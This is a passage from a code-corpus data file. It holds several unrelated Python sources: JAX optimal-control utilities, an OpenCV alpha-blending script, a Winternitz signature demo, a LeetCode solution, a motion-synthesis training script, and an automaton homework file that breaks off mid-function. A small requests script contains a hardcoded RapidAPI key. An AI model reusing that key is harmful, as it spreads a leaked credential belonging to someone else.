raise RuntimeError(f'Invalid resampling type \"{algo_params[\"resampling_type\"]}\"')\n\n\n # just resample ALL the xs anyway, and later let the mask decide which to keep.\n # resampled_xs = scale @ jax.random.normal(key, (algo_params['n_trajectories'], nx, 1))\n resampled_xs = jax.random.multivariate_normal(\n key,\n mean=np.zeros(nx,),\n cov=algo_params['x_sample_cov'],\n shape=(algo_params['n_trajectories'],)\n )\n\n\n # add extra dimension to resampling mask for broadcasting\n new_xs = np.where(resample_mask[:, None], resampled_xs, old_xs)\n\n # every trajectory is at the same time...\n ts = t * np.ones((algo_params['n_trajectories'], 1))\n\n # input vector of the NN\n # squeeze removes the last 1. (n_traj, nx, 1) -> (n_traj, nx).\n # because the NN doesn't work with explicit (n, 1) shaped column vectors\n resampled_ts_and_xs = np.concatenate([ts, resampled_xs], axis=1)\n\n # these value gradients are with respect to (t, x). so we also have time\n # gradients, not only the ones w.r.t. state. can we do something with those as well?\n\n # we have d/dt V(t, x(t)) = V_t(t, x(t)) + V_x(t, x(t)).T d/dt x(t)\n # or d/dt V(t, x(t)) = [V_t(t, x(t)) V_x(t, x(t))] @ [1 d/dt x(t)]\n # this is basically a linear system which (probably?) we can solve for\n # V_t(t, x(t)) (partial derivative in first argument, not total time derivative)\n # so, TODO, also try to incorporate time gradient during training.\n\n # do some jax magic\n V_fct = lambda z: nn_apply_fct(nn_params, z).reshape()\n V_fct_and_grad = jax.value_and_grad(V_fct)\n V_fct_and_grad_batch = jax.vmap(V_fct_and_grad)\n\n resampled_Vs, resampled_V_grads = V_fct_and_grad_batch(resampled_ts_and_xs)\n\n # weird [None] tricks so it doesn't do any wrong broadcasting\n # V grads [1:] because the NN output also is w.r.t. t which at the moment we don't need\n new_Vs = np.where(resample_mask , resampled_Vs , old_Vs)\n new_V_grads = np.where(resample_mask[:, None], resampled_V_grads[:, 1:], old_V_grads)\n\n # circumventing jax's immutable objects.\n # if docs are to be believed, after jit this will do an efficient in place update.\n ys = ys.at[:, 0:nx].set(new_xs)\n ys = ys.at[:, nx:2*nx].set(new_V_grads)\n ys = ys.at[:, -1].set(new_Vs)\n\n return ys, resample_mask\n\n\n\n\ndef sol_array_to_train_data(all_sols, all_ts, resampling_i, n_timesteps, algo_params):\n\n # basically, this takes the data in all_sols and all_ts, slices out the\n # relevant part between the current resampling (resampling_i) and the\n # lookback horizon, and reshapes it accordingly so the NN can handle it.\n\n # training data terminology:\n\n # input = [t, state], label = V\n\n # reshape - during training we do not care which is the time and which the\n # trajectory index, they are all just pairs of ((t, x), V) regardless\n\n # before we have a shape (n_traj, n_time, 2*nx+1, 1).\n # here we remove the last dimension - somehow it makes NN stuff easier.\n\n nx = (all_sols.shape[2]-1) // 2\n\n if algo_params['nn_train_lookback'] == np.inf:\n # use ALL the training data available\n train_time_idx = np.arange(resampling_i, n_timesteps)\n else:\n lookback_indices = int(algo_params['nn_train_lookback'] / algo_params['dt'])\n upper_train_time_idx = resampling_i + lookback_indices\n if upper_train_time_idx > n_timesteps:\n # If available data <= lookback, just use whatever we have.\n upper_train_time_idx = n_timesteps\n\n train_time_idx = np.arange(resampling_i, upper_train_time_idx)\n\n train_states = all_sols[:, train_time_idx, 0:nx].reshape(-1, nx)\n\n # make new axes to match train_state\n train_ts = all_ts[None, train_time_idx]\n # repeat for all trajectories (axis 0), which all have the same ts.\n train_ts = np.repeat(train_ts, algo_params['n_trajectories'], axis=0)\n # flatten the same way as train_states\n train_ts = train_ts.reshape(-1, 1)\n\n # assemble into main data arrays\n # these are of shape (n_datpts, n_inputfeatures) and (n_datapts, 1)\n train_inputs = np.concatenate([train_ts, train_states], axis=1)\n\n if algo_params['nn_V_gradient_penalty'] == 0:\n train_labels = all_sols[:, train_time_idx, 2*nx].reshape(-1, 1)\n else:\n assert algo_params['nn_V_gradient_penalty'] > 0, 'V gradient penalty must be nonnegative'\n\n # if this penalty is > 0, we also want the value gradient (= costate) to be in the\n # labels, which becomes vector-valued. in the NN code we then add a loss term penalising\n # gradient error, something like || grad_x V_nn (x) - λ(x) ||^2\n\n # we want from the extended state, in this order:\n # - the costate at indices nx:2*nx\n # - the value at index 2*nx, which is the last one\n train_labels = all_sols[:, train_time_idx, nx:].reshape(-1, 1 + nx)\n\n\n return train_inputs, train_labels\n\n","repo_name":"mbjd/approximate_optimal_control","sub_path":"array_juggling.py","file_name":"array_juggling.py","file_ext":"py","file_size_in_byte":7209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"35337575713","text":"__author__ = 'Shahrukh khan'\r\n\r\n\"\"\" \r\nTransparent Image overlay(Alpha blending) with OpenCV and Python\r\n\"\"\"\r\n\r\nimport cv2\r\nimport numpy as np\r\n\r\n# function to overlay a transparent image on backround.\r\ndef transparentOverlay(src , overlay , pos=(0,0),scale = 1):\r\n \"\"\"\r\n :param src: Input Color Background Image\r\n :param overlay: transparent Image (BGRA)\r\n :param pos: position where the image to be blit.\r\n :param scale : scale factor of transparent image.\r\n :return: Resultant Image\r\n \"\"\"\r\n overlay = cv2.resize(overlay,(0,0),fx=scale,fy=scale)\r\n h,w,_ = overlay.shape # Size of pngImg\r\n rows,cols,_ = src.shape # Size of background Image\r\n y,x = pos[0],pos[1] # Position of PngImage\r\n \r\n #loop over all pixels and apply the blending equation\r\n for i in range(h):\r\n for j in range(w):\r\n if x+i >= rows or y+j >= cols:\r\n continue\r\n alpha = float(overlay[i][j][3]/255.0) # read the alpha channel \r\n src[x+i][y+j] = alpha*overlay[i][j][:3]+(1-alpha)*src[x+i][y+j]\r\n return src\r\n\r\n\"\"\" ----------- Read all images --------------------\"\"\"\r\nbImg = cv2.imread(\"background.jpg\")\r\n\r\n# KeyPoint : Remember to use cv2.IMREAD_UNCHANGED flag to load the image with alpha channel\r\npngImage = cv2.imread(\"foreground.png\" , cv2.IMREAD_UNCHANGED)\r\nlogoImage = cv2.imread(\"logo.png\",cv2.IMREAD_UNCHANGED)\r\n\r\n# Overlay transparent images at desired postion(x,y) and Scale. \r\nresult = transparentOverlay(bImg,pngImage,(300,0),0.7)\r\nresult = transparentOverlay(bImg,logoImage,(800,400),2)\r\n\r\n#Display the result \r\ncv2.namedWindow(\"Result\",cv2.WINDOW_NORMAL)\r\ncv2.imshow(\"Result\" ,result)\r\ncv2.waitKey()\r\ncv2.destroyAllWindows()\r\n","repo_name":"sk1210/Alpha-Blending","sub_path":"source/alpha_blend.py","file_name":"alpha_blend.py","file_ext":"py","file_size_in_byte":1715,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"34"} +{"seq_id":"25133208796","text":"'''Example implementation of Winternitz one-time signature scheme'''\r\n\r\nimport hashlib\r\nimport secrets\r\n\r\ndef fromBytesToBinary(bytes: bytes) -> list[str]:\r\n '''Converts bytes to list of 8bit binary strings.'''\r\n binaryList: list[str] = []\r\n for byte in bytes:\r\n binaryList.append(bin(byte)[2:].zfill(8))\r\n return binaryList\r\n\r\n\r\ndef generateKeyPair() -> tuple[list[bytes], list[bytes]]:\r\n '''Generates (secretKey, publicKey) pair, where secretKey is secret and publicKey is public key.'''\r\n secretKey: list[bytes] = []\r\n publicKey: list[bytes] = []\r\n for i in range(32): # generates 32 random values for secret key and hashes every one of them 256 times to create public key\r\n secretKey.append(secrets.token_bytes(32))\r\n publicKeyElement = hashlib.sha256(secretKey[i]).digest()\r\n for j in range(1, 256):\r\n publicKeyElement = hashlib.sha256(publicKeyElement).digest()\r\n publicKey.append(publicKeyElement)\r\n return (secretKey, publicKey)\r\n\r\ndef sign(message: str, secretKey: list[bytes]) -> list[bytes]:\r\n '''Generates signature for the message.'''\r\n signature: list[bytes] = []\r\n messageHash = fromBytesToBinary(hashlib.sha256(message.encode('utf-8')).digest()) # hashes the message and converts it to 8-bit binary strings\r\n for i in range(len(messageHash)): \r\n N = int(messageHash[i], 2) # converts value N (8-bit string from message hash) from binary to decimal\r\n signatureElement = hashlib.sha256(secretKey[i]).digest() \r\n for j in range(1, 256 - N): # creates the signature by hashing every element of secret key 256-N times\r\n signatureElement = hashlib.sha256(signatureElement).digest()\r\n signature.append(signatureElement)\r\n return signature\r\n\r\ndef verifySignature(signature: list[bytes], message: str, publicKey: list[bytes]) -> bool: \r\n '''Returns True if signature is compatible with public key, False otherwise.'''\r\n messageHash = fromBytesToBinary(hashlib.sha256(message.encode('utf-8')).digest())\r\n for i in range(len(signature)):\r\n N = int(messageHash[i], 2)\r\n signatureElement = hashlib.sha256(signature[i]).digest()\r\n for j in range(1, N): # hashes every element in signature another N times and compares it with corresponding value in public key\r\n signatureElement = hashlib.sha256(signatureElement).digest()\r\n if signatureElement != publicKey[i]:\r\n return False\r\n return True\r\n\r\nif __name__ == \"__main__\":\r\n keypair = generateKeyPair()\r\n message = \"This is message\"\r\n signature = sign(message, keypair[0])\r\n print(f\"Signature verification: {verifySignature(signature, message, keypair[1])}\")","repo_name":"shionorix/krypto-projekt","sub_path":"winternitzSignature.py","file_name":"winternitzSignature.py","file_ext":"py","file_size_in_byte":2709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"22151518644","text":"# 497. 非重叠矩形中的随机点\n# 给定一个由非重叠的轴对齐矩形的数组 rects ,其中 rects[i] = [ai, bi, xi, yi] 表示 (ai, bi) 是第 i 个矩形的左下角点,(xi, yi) 是第 i 个矩形的右上角角点。设计一个算法来随机挑选一个被某一矩形覆盖的整数点。��形周长上的点也算做是被矩形覆盖。所有满足要求的点必须等概率被返回。\n\n# 在一个给定的矩形覆盖的空间内任何整数点都有可能被返回。\n\n# 请注意 ,整数点是具有整数坐标的点。\n\n# 实现 Solution 类:\n\n# Solution(int[][] rects) 用给定的矩形数组 rects 初始化对象。\n# int[] pick() 返回一个随机的整数点 [u, v] 在给定的矩形所覆盖的空间内。\n\n# 来源:力扣(LeetCode)\n# 链接:https://leetcode.cn/problems/random-point-in-non-overlapping-rectangles\n# 著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\n\nfrom bisect import bisect_left\nfrom random import randint, randrange\nfrom typing import List\n\n### 注意要用坐标点数来计算前缀和。不能直接用面积。\nclass Solution:\n\n def __init__(self, rects: List[List[int]]):\n self.rects=rects\n self.preSum=[0]\n for a,b,x,y in rects:\n self.preSum.append(self.preSum[-1]+(x-a+1)*(y-b+1))\n\n\n def pick(self) -> List[int]:\n num = randint(1,self.preSum[-1])\n ind = bisect_left(self.preSum,num)\n a,b,x,y= self.rects[ind-1]\n dx = randint(0,x-a)\n dy = randint(0,y-b)\n return [a+dx,b+dy]\n\n\n\n\n# Your Solution object will be instantiated and called as such:\n# obj = Solution(rects)\n# param_1 = obj.pick()","repo_name":"songc/LeetCode-Pyhton","sub_path":"leetcode497.py","file_name":"leetcode497.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"21958938808","text":"import requests\n\nurl = \"https://covid-193.p.rapidapi.com/countries\"\n\nheaders = {\n\t\"X-RapidAPI-Key\": \"04e141f621mshff42f59e4293c77p1d374djsne10510899cae\",\n\t\"X-RapidAPI-Host\": \"covid-193.p.rapidapi.com\"\n}\n\nresponse = requests.request(\"GET\", url, headers=headers)\n\nprint(response.text)","repo_name":"Beny07/TP1_GR01","sub_path":"helloworld.py","file_name":"helloworld.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"4284223788","text":"import random\nimport torch\nfrom torch.utils.data.dataloader import DataLoader\nfrom motion_data import TestMotionData, TrainMotionData\nimport pymotion.rotations.quat as quat\nfrom pymotion.ops.skeleton import from_root_dual_quat\nfrom pymotion.io.bvh import BVH\nimport numpy as np\nfrom train_data import Train_Data\nfrom generator_architecture import Generator_Model\nfrom ik_architecture import IK_Model\nimport time\nimport argparse\nimport os\nimport eval_metrics\n\nscale = 1\n\n# Train Modes\nGENERATOR = 1\nIK = 2\n\nparam = {\n \"batch_size\": 256,\n \"epochs\": 500,\n \"kernel_size_temporal_dim\": 15,\n \"neighbor_distance\": 2,\n \"stride_encoder_conv\": 2,\n \"learning_rate\": 1e-4,\n \"lambda_root\": 10,\n \"lambda_ee\": 10 / scale,\n \"lambda_ee_reg\": 1 / scale,\n \"sparse_joints\": [\n 0, # first should be root (as assumed by loss.py)\n 4, # left foot\n 8, # right foot\n 13, # head\n 17, # left hand\n 21, # right hand\n ],\n \"window_size\": 64,\n \"window_step\": 16,\n \"seed\": 2222,\n}\n\nassert param[\"kernel_size_temporal_dim\"] % 2 == 1\n\n\ndef main(args):\n # Set seed\n torch.manual_seed(param[\"seed\"])\n random.seed(param[\"seed\"])\n np.random.seed(param[\"seed\"])\n\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n print(\"Using device:\", device)\n # Additional Info when using cuda\n if device.type == \"cuda\":\n print(torch.cuda.get_device_name(0))\n\n # Prepare Data\n train_eval_dir = args.data_path\n # check if train and eval directories exist\n train_dir = os.path.join(train_eval_dir, \"train\")\n if not os.path.exists(train_dir):\n raise ValueError(\"train directory does not exist\")\n train_files = os.listdir(train_dir)\n eval_dir = os.path.join(train_eval_dir, \"eval\")\n if not os.path.exists(eval_dir):\n raise ValueError(\"eval directory does not exist\")\n eval_files = os.listdir(eval_dir)\n train_dataset = TrainMotionData(param, scale, device)\n eval_dataset = TestMotionData(param, scale, device)\n reference_parents = None # used to make sure all bvh have the same structure\n # Train Files\n for filename in train_files:\n if filename[-4:] == \".bvh\":\n rots, pos, parents, offsets, _ = get_info_from_bvh(\n get_bvh_from_disk(train_dir, filename)\n )\n if reference_parents is None:\n reference_parents = parents.copy()\n assert (\n reference_parents == parents\n ) # make sure all bvh have the same structure\n # Train Dataset\n train_dataset.add_motion(\n offsets,\n pos[:, 0, :], # only global position\n rots,\n parents,\n )\n # Once all train files are added, compute the means and stds and normalize\n train_dataset.normalize()\n eval_dataset.set_means_stds(train_dataset.means, train_dataset.stds)\n # Eval Files\n for filename in eval_files:\n if filename[-4:] == \".bvh\":\n rots, pos, parents, offsets, bvh = get_info_from_bvh(\n get_bvh_from_disk(eval_dir, filename)\n )\n assert (\n reference_parents == parents\n ) # make sure all bvh have the same structure\n # Eval Dataset\n eval_dataset.add_motion(\n offsets,\n pos[:, 0, :], # only global position\n rots,\n parents,\n bvh,\n filename,\n )\n # Once all eval files are added, normalize\n eval_dataset.normalize()\n\n train_dataloader = DataLoader(train_dataset, param[\"batch_size\"], shuffle=False)\n\n # Create Models\n train_data = Train_Data(device, param)\n generator_model = Generator_Model(device, param, reference_parents, train_data).to(\n device\n )\n if args.train_mode & IK != 0:\n ik_model = IK_Model(device, param, reference_parents, train_data).to(device)\n train_data.set_means(train_dataset.means[\"dqs\"])\n train_data.set_stds(train_dataset.stds[\"dqs\"])\n\n # Load Models\n _, generator_path, ik_path = get_model_paths(args.name, train_eval_dir)\n if args.train_mode & GENERATOR == 0 or (args.load and args.train_mode & IK != 0):\n # Generator is always needed with IK, load it if not training it\n load_model(generator_model, generator_path, train_data, device)\n if args.train_mode & IK != 0 and args.load:\n load_model(ik_model, ik_path, train_data, device)\n\n if (args.train_mode & GENERATOR == 0 or args.train_mode & IK == 0) and args.load:\n # Check previous best evaluation loss\n results = evaluate_generator(generator_model, train_data, eval_dataset)\n if args.train_mode & IK != 0:\n results_ik = evaluate_ik(ik_model, results, train_data, eval_dataset)\n results = results_ik\n mpjpe, mpeepe = eval_save_result(\n results,\n train_dataset.means,\n train_dataset.stds,\n eval_dir,\n device,\n save=False,\n )\n best_evaluation = mpjpe + mpeepe\n else:\n best_evaluation = float(\"inf\")\n # Training Loop\n start_time = time.time()\n for epoch in range(param[\"epochs\"]):\n avg_train_loss = 0.0\n for step, (denorm_motion, norm_motion) in enumerate(train_dataloader):\n # Forward\n train_data.set_offsets(norm_motion[\"offsets\"], denorm_motion[\"offsets\"])\n train_data.set_motions(\n norm_motion[\"dqs\"],\n norm_motion[\"displacement\"],\n )\n if args.train_mode & GENERATOR != 0:\n generator_model.train()\n if args.train_mode & GENERATOR != 0 or args.train_mode & IK != 0:\n res_decoder = generator_model.forward()\n if args.train_mode & IK != 0:\n ik_model.train()\n ik_model.forward(res_decoder)\n # Loss\n loss = 0.0\n if args.train_mode & GENERATOR != 0:\n loss_generator = generator_model.optimize_parameters()\n loss = loss_generator.item()\n if args.train_mode & IK != 0:\n loss_ik = ik_model.optimize_parameters(res_decoder)\n loss += loss_ik.item()\n avg_train_loss += loss\n # Evaluate & Print\n if step == len(train_dataloader) - 1:\n if args.train_mode & GENERATOR != 0 or args.train_mode & IK != 0:\n results = evaluate_generator(\n generator_model, train_data, eval_dataset\n )\n if args.train_mode & IK != 0:\n results_ik = evaluate_ik(\n ik_model,\n results,\n train_data,\n eval_dataset,\n )\n results = results_ik\n mpjpe, mpeepe = eval_save_result(\n results,\n train_dataset.means,\n train_dataset.stds,\n eval_dir,\n device,\n save=False,\n )\n evaluation_loss = mpjpe + mpeepe\n # If best, save model\n was_best = False\n if evaluation_loss < best_evaluation:\n save_model(\n generator_model if args.train_mode & GENERATOR != 0 else None,\n ik_model if args.train_mode & IK != 0 else None,\n train_dataset,\n args.name,\n train_eval_dir,\n )\n best_evaluation = evaluation_loss\n was_best = True\n # Print\n avg_train_loss /= len(train_dataloader)\n if args.train_mode & GENERATOR != 0 or args.train_mode & IK != 0:\n print(\n \"Epoch: {} - Train Loss: {:.4f} - Eval Loss: {:.4f} - MPJPE: {:.4f} - MPEEPE: {:.4f}\".format(\n epoch, avg_train_loss, evaluation_loss, mpjpe, mpeepe\n )\n + (\"*\" if was_best else \"\")\n )\n\n end_time = time.time()\n print(\"Training Time:\", end_time - start_time)\n\n # Load Best Model -> Save and/or Evaluate\n if args.train_mode & GENERATOR != 0 or args.train_mode & IK != 0:\n load_model(generator_model, generator_path, train_data, device)\n results = evaluate_generator(generator_model, train_data, eval_dataset)\n if args.train_mode & IK != 0:\n load_model(ik_model, ik_path, train_data, device)\n results_ik = evaluate_ik(ik_model, results, train_data, eval_dataset)\n results = results_ik\n\n mpjpe, mpeepe = eval_save_result(\n results, train_dataset.means, train_dataset.stds, eval_dir, device\n )\n evaluation_loss = mpjpe + mpeepe\n\n print(\"Evaluate Loss: {}\".format(evaluation_loss))\n if args.train_mode & (GENERATOR | IK) != 0:\n print(\"Mean Per Joint Position Error: {}\".format(mpjpe))\n print(\"Mean End Effector Position Error: {}\".format(mpeepe))\n\n\ndef eval_save_result(results, train_means, train_stds, eval_dir, device, save=True):\n # Save Result\n array_mpjpe = np.empty((len(results),))\n array_mpeepe = np.empty((len(results),))\n for step, (res, bvh, filename) in enumerate(results):\n if save:\n eval_path, eval_filename = result_to_bvh(\n res, train_means, train_stds, bvh, filename\n )\n # Evaluate Positional Error\n mpjpe, mpeepe = eval_metrics.eval_pos_error(\n get_bvh_from_disk(eval_dir, filename),\n get_bvh_from_disk(eval_path, eval_filename),\n device,\n )\n else:\n result_to_bvh(res, train_means, train_stds, bvh, None, save=False)\n # Evaluate Positional Error\n mpjpe, mpeepe = eval_metrics.eval_pos_error(\n get_bvh_from_disk(eval_dir, filename),\n bvh,\n device,\n )\n\n array_mpjpe[step] = mpjpe\n array_mpeepe[step] = mpeepe\n\n return np.mean(array_mpjpe), np.mean(array_mpeepe)\n\n\ndef load_model(model, model_path, train_data, device):\n model_name = os.path.basename(model_path)[: -len(\".pt\")]\n assert model_name == \"generator\" or model_name == \"ik\"\n if model_name == \"generator\":\n data_path = model_path[: -len(\"generator.pt\")] + \"data.pt\"\n checkpoint = torch.load(model_path, map_location=device)\n model.load_state_dict(checkpoint[\"model_state_dict\"])\n elif model_name == \"ik\":\n data_path = model_path[: -len(\"ik.pt\")] + \"data.pt\"\n checkpoint = torch.load(model_path, map_location=device)\n model.load_state_dict(checkpoint[\"model_state_dict\"])\n data = torch.load(data_path, map_location=device)\n means = data[\"means\"]\n stds = data[\"stds\"]\n train_data.set_means(means[\"dqs\"])\n train_data.set_stds(stds[\"dqs\"])\n return means, stds\n\n\ndef get_model_paths(name, train_eval_dir):\n model_name = (\n \"model_\" + name + \"_\" + os.path.basename(os.path.normpath(train_eval_dir))\n )\n model_dir = os.path.join(\"models\", model_name)\n if not os.path.exists(model_dir):\n os.makedirs(model_dir)\n\n data_path = os.path.join(model_dir, \"data.pt\")\n generator_path = os.path.join(model_dir, \"generator.pt\")\n ik_path = os.path.join(model_dir, \"ik.pt\")\n return data_path, generator_path, ik_path\n\n\ndef save_model(\n generator_model,\n ik_model,\n train_dataset,\n name,\n train_eval_dir,\n):\n data_path, generator_path, ik_path = get_model_paths(name, train_eval_dir)\n\n if train_dataset is not None:\n torch.save(\n {\n \"means\": train_dataset.means,\n \"stds\": train_dataset.stds,\n },\n data_path,\n )\n if generator_model is not None:\n torch.save(\n {\n \"model_state_dict\": generator_model.state_dict(),\n },\n generator_path,\n )\n if ik_model is not None:\n torch.save(\n {\n \"model_state_dict\": ik_model.state_dict(),\n },\n ik_path,\n )\n\n\ndef get_bvh_from_disk(path, filename):\n path = os.path.join(path, filename)\n bvh = BVH()\n bvh.load(path)\n return bvh\n\n\ndef get_info_from_bvh(bvh):\n rot_roder = np.tile(bvh.data[\"rot_order\"], (bvh.data[\"rotations\"].shape[0], 1, 1))\n rots = quat.unroll(\n quat.from_euler(np.radians(bvh.data[\"rotations\"]), order=rot_roder),\n axis=0,\n )\n rots = quat.normalize(rots) # make sure all quaternions are unit quaternions\n pos = bvh.data[\"positions\"]\n parents = bvh.data[\"parents\"]\n parents[0] = 0 # BVH sets root as None\n offsets = bvh.data[\"offsets\"]\n offsets[0] = np.zeros(3) # force to zero offset for root joint\n return rots, pos, parents, offsets, bvh\n\n\ndef evaluate_generator(generator_model, train_data, dataset, sparse_motions=None):\n # WARNING: means and stds for the model are not set in this function... they should be set before\n generator_model.eval()\n results = []\n with torch.no_grad():\n for index in range(dataset.get_len()):\n norm_motion = dataset.get_item(index)\n train_data.set_offsets(\n norm_motion[\"offsets\"].unsqueeze(0),\n norm_motion[\"denorm_offsets\"].unsqueeze(0),\n )\n train_data.set_motions(\n norm_motion[\"dqs\"].unsqueeze(0),\n norm_motion[\"displacement\"].unsqueeze(0),\n )\n if sparse_motions is not None:\n train_data.set_sparse_motion(sparse_motions[index])\n res = generator_model.forward()\n bvh, filename = dataset.get_bvh(index)\n results.append((res, bvh, filename))\n return results\n\n\ndef evaluate_ik(ik_model, results_decoder, train_data, dataset):\n # WARNING: means and stds for the model are not set in this function... they should be set before\n ik_model.eval()\n results = []\n with torch.no_grad():\n for index in range(dataset.get_len()):\n norm_motion = dataset.get_item(index)\n train_data.set_offsets(\n norm_motion[\"offsets\"].unsqueeze(0),\n norm_motion[\"denorm_offsets\"].unsqueeze(0),\n )\n train_data.set_motions(\n norm_motion[\"dqs\"].unsqueeze(0),\n norm_motion[\"displacement\"].unsqueeze(0),\n )\n res = ik_model.forward(results_decoder[index][0])\n bvh, filename = dataset.get_bvh(index)\n results.append((res, bvh, filename))\n return results\n\n\ndef run_set_data(train_data, dataset):\n with torch.no_grad():\n norm_motion = dataset.get_item()\n train_data.set_offsets(\n norm_motion[\"offsets\"].unsqueeze(0),\n norm_motion[\"denorm_offsets\"].unsqueeze(0),\n )\n train_data.set_motions(\n norm_motion[\"dqs\"].unsqueeze(0),\n norm_motion[\"displacement\"].unsqueeze(0),\n )\n\n\ndef run_generator(model):\n # WARNING: means and stds for the model are not set in this function... they should be set before\n model.eval()\n with torch.no_grad():\n res_decoder = model.forward()\n return res_decoder\n\n\ndef run_ik(model, res_decoder, frame=None):\n # WARNING: means and stds for the model are not set in this function... they should be set before\n model.eval()\n with torch.no_grad():\n res = model.forward(res_decoder, frame)\n return res\n\n\ndef result_to_bvh(res, means, stds, bvh, filename, save=True):\n res = res.permute(0, 2, 1)\n res = res.flatten(0, 1)\n res = res.cpu().detach().numpy()\n # get dqs and displacement\n dqs = res\n # denormalize\n dqs = dqs * stds[\"dqs\"].cpu().numpy() + means[\"dqs\"].cpu().numpy()\n # get rotations and translations from dual quatenions\n dqs = dqs.reshape(dqs.shape[0], -1, 8)\n _, rots = from_root_dual_quat(dqs, np.array(bvh.data[\"parents\"]))\n # quaternions to euler\n rot_roder = np.tile(bvh.data[\"rot_order\"], (rots.shape[0], 1, 1))\n rotations = np.degrees(quat.to_euler(rots, order=rot_roder))\n bvh.data[\"rotations\"] = rotations\n # positions\n positions = bvh.data[\"positions\"][: rotations.shape[0]]\n bvh.data[\"positions\"] = positions\n # save\n bvh.data[\"parents\"][0] = None # BVH sets root as None\n path = None\n if save:\n path = \"data\"\n filename = \"eval_\" + filename\n bvh.save(os.path.join(path, filename), bvh.data)\n return path, filename\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Train Motion Upsampling Network\")\n parser.add_argument(\n \"data_path\",\n type=str,\n help=\"path to data directory containing one or multiple .bvh for training, last .bvh is used as test data\",\n )\n parser.add_argument(\n \"name\",\n type=str,\n help=\"name of the experiment, used to save the model and the logs\",\n )\n parser.add_argument(\n \"train_mode\",\n type=str.lower,\n choices=[\"generator\", \"ik\", \"all\"],\n )\n parser.add_argument(\n \"--load\",\n action=\"store_true\",\n help=\"load the model(s) from a checkpoint\",\n )\n args = parser.parse_args()\n if args.train_mode == \"generator\":\n args.train_mode = GENERATOR\n elif args.train_mode == \"ik\":\n args.train_mode = IK\n elif args.train_mode == \"all\":\n args.train_mode = GENERATOR | IK\n main(args)\n","repo_name":"UPC-ViRVIG/SparsePoser","sub_path":"python/src/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":17827,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"34"} +{"seq_id":"12050342645","text":"#!/usr/bin/env python3\n\"\"\"\nRead a regular expression and returns:\n * YES if word is recognized\n * NO if word is rejected\"\"\"\n\nfrom typing import Set, List\nfrom automaton import Automaton, EPSILON, State, error, warn, RegExpReader\nimport sys\nimport pdb # for debugging\n\n##################\n\ndef is_deterministic(a:Automaton)->bool:\n for(source,symb,dest) in a.transitions:\n for (source1, symb1, dest1) in a.transitions:\n if source == source1 and symb == symb1 and dest!=dest1 or symb == EPSILON :\n return False\n return True\n \n##################\n \ndef recognizes(a:'Automaton', word:str)->bool:\n this_state = str(a.initial) \n if word == EPSILON and this_state in a.acceptstates: \n return True\n for l in word :\n if l not in a.statesdict[this_state].transitions:\n return False\n this_state = str(list(a.statesdict[this_state].transitions[l])[0])\n if (this_state not in a.acceptstates):\n return False\n return True \n \n \n##################\n\ndef determinise(a:Automaton):\n remove_epsilon_transitions(a)\n trans_reduction(a)\n \n##################\n\ndef epsilon_transitions(a:Automaton):\n list_epsilon_transitions=[]\n for(source,symb,dest) in a.transitions:\n if symb == EPSILON :\n trans = source,symb,dest\n list_epsilon_transitions.append(trans)\n return list_epsilon_transitions\n\n\n#################\n\n\ndef remove_epsilon_transitions (a :Automaton) : \n transitions = a.transitions\n e_transitions = epsilon_transitions(a)\n for trans in transitions:\n for trans2 in e_transitions:\n if trans[0] == trans2[2]: \n a.add_transition(trans2[0], trans[1], trans[2]) \n a.remove_transition(trans2[0], trans2[1], trans2[2])\n a.make_accept(trans[2])\n \n#####################\n\ndef trans_reduction(a) :\n new_a = Automaton(\"det\")\n new_states = [a.initial.name] \n while len(new_states) !=0:\n for symb in a.alphabet :\n dest = set([]) \n for trans in a.transitions :\n if trans[0] in new_states[0] and trans[1]== symb: \n t =( trans[2] ) \n dest = dest.union(set([t]))\n if dest!= set ([]):\n new_a.add_transition(str(new_states[0]),symb, str(dest)) \n for state in a.acceptstates:\n if state in dest :\n new_a.make_accept(str(dest)) \n if dest not in new_states :\n new_states.append(dest)\n new_states.pop(0)\n return new_a \n##################### \n\n\n##################\n\n\ndef kleene(a1:Automaton)->Automaton:\n a1star = a1.deepcopy()\n a1star.name = \"a1star\"\n \n for state in a1star.acceptstates:\n a1star.add_transition(state,EPSILON,a1star.initial.name)\n a1star.add_transition(nouvel_etat(a1),EPSILON,a1.initial.name)\n a1star.initial = a1star.statesdict[nouvel_etat(a1)]\n a1star.make_accept(nouvel_etat(a1))\n\n return a1star\n\n\n##################\n\ndef nouvel_etat(a1:Automaton)->str:\n \"\"\"Trouve un nouveau nom d'état supérieur au max dans `a1`\"\"\"\n maxstate = -1\n for a in a1.states :\n try :\n maxstate = max(int(a), maxstate)\n except ValueError:\n pass\n return str(maxstate + 1)\n##################\n\ndef concat(a1:Automaton, a2:Automaton)->Automaton:\n a1star_a2 = a1.deepcopy()\n a1star_a2.name = \"a1star_a2\"\n nom_nouvel_etat = nouvel_etat(a1star_a2)\n \n for trans in a2.transitions:\n if trans[0] == a2.initial.name: \n a1star_a2.add_transition(nom_nouvel_etat, trans[1], str(int(trans[2]) + int(nom_nouvel_etat)))\n else :\n a1star_a2.add_transition(str(int(trans[0]) +int(nom_nouvel_etat)),trans[1], str(int(trans[2]) +int(nom_nouvel_etat)))\n \n for s in a2.states : \n if s in a2.acceptstates : \n a1star_a2.make_accept(str(int(s)+ int(nom_nouvel_etat))) \n for s in a1star_a2.acceptstates:\n if int(s[0])< int(nom_nouvel_etat):\n a1star_a2.add_transition(s, EPSILON, nom_nouvel_etat)\n for s in a1star_a2.acceptstates :\n if int(s[0]) < int(nom_nouvel_etat):\n a1star_a2.make_accept(s, False)\n return a1star_a2 \n\n##################\n\ndef union(a1:Automaton, a2:Automaton)->Automaton:\n a1star_a2_or_a3 = a1.deepcopy()\n a1star_a2_or_a3.name = \"a1star_a2_or_a3\"\n nom_nouvel_etat = nouvel_etat(a1star_a2_or_a3)\n for 